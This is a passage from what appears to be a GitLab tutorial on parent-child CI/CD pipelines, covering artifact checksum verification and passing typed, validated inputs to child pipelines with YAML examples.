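  "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/${PACKAGE_NAME}/${PACKAGE_VERSION}/${ARTIFACT_FILE}.sha256"

# Child side: after downloading both files, verify the artifact's integrity
sha256sum -c "${ARTIFACT_FILE}.sha256"
```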
### Using inputs to pass variables to a child pipeline

If you made it this far in this tutorial and you have plans to start creating new pipeline configurations, you might want to start by evaluating whether your use case can benefit from using **inputs** to pass variables to other pipelines. Using inputs is a recommended way to pass variables when you need to define specific values in a CI/CD job and have those values remain fixed during the pipeline run. Inputs might offer certain advantages over the method we implemented before. For example, with inputs, you can include data validation through options (i.e., values must be one of `[staging, prod]`), variable descriptions, and type checking, and assign default values before the pipeline run.

#### Configuring CI/CD inputs

Consider the following parent pipeline configuration:

```yaml
# .gitlab-ci.yml (main file)
stages:
  - trigger

trigger-staging:
  stage: trigger
  trigger:
    include:
      - local: service_a/.gitlab-ci.yml
        inputs:
          environment: staging
          version: "1.0.0"
```

Let's zoom in on the main difference between the code snippet above and the previous parent pipeline examples in this tutorial:

```yaml
trigger:
  include:
    - local: service_a/.gitlab-ci.yml
      inputs:
        environment: staging
        version: "1.0.0"
```

The main difference is the use of the reserved word `inputs`. This part of the YAML configuration can be read in natural language as: "trigger the child pipeline defined in `service_a/.gitlab-ci.yml` and make sure to pass `environment: staging` and `version: 1.0.0` as input variables that the child pipeline will know how to use."

#### Reading CI/CD inputs in child pipelines

Moving to the child pipeline, it must contain in its declaration a spec that defines the inputs it can take. For each input, it is possible to add a description, a set of predefined options the input value can take, and the type of value it accepts. This is illustrated as follows:

```yaml
# target pipeline, or child pipeline in this case
spec:
  inputs:
    environment:
      description: "Deployment environment"
      options: [staging, production]
    version:
      type: string
      description: "Application version"
---
stages:
  - deploy

# Jobs that will use the inputs
deploy:
  stage: deploy
  script:
    - echo "Deploying version $[[ inputs.version ]] to $[[ inputs.environment ]]"
```

Notice from the code snippet that, after defining the spec, there is a YAML document separator (`---`) followed by the actual child pipeline definition, where we access the values `$[[ inputs.version ]]` and `$[[ inputs.environment ]]` from the defined inputs using input interpolation.
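One consequence of declaring the spec in the child pipeline is reusability: the same child pipeline can be triggered several times with different input values, and a value outside the declared `options` should fail validation at pipeline creation time, before any job runs. Here is a minimal sketch; the second trigger job is illustrative and not part of the example project:

```yaml
trigger-staging:
  stage: trigger
  trigger:
    include:
      - local: service_a/.gitlab-ci.yml
        inputs:
          environment: staging
          version: "1.0.0"

# Hypothetical second trigger job reusing the same child pipeline
trigger-production:
  stage: trigger
  trigger:
    include:
      - local: service_a/.gitlab-ci.yml
        inputs:
          environment: production   # must be one of [staging, production]
          version: "1.0.0"
```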
## Get hands-on with parent-child pipelines, artifacts, and more

We hope this article has helped with navigating the challenge of sharing variables and artifacts in parent-child pipeline setups. To try these examples for yourself, feel free to view or fork the Premium/Ultimate and the GitLab Package Registry examples of sharing artifacts. You can also sign up for a 30-day free trial of GitLab Ultimate to experience all the features GitLab has to offer. Thanks for reading!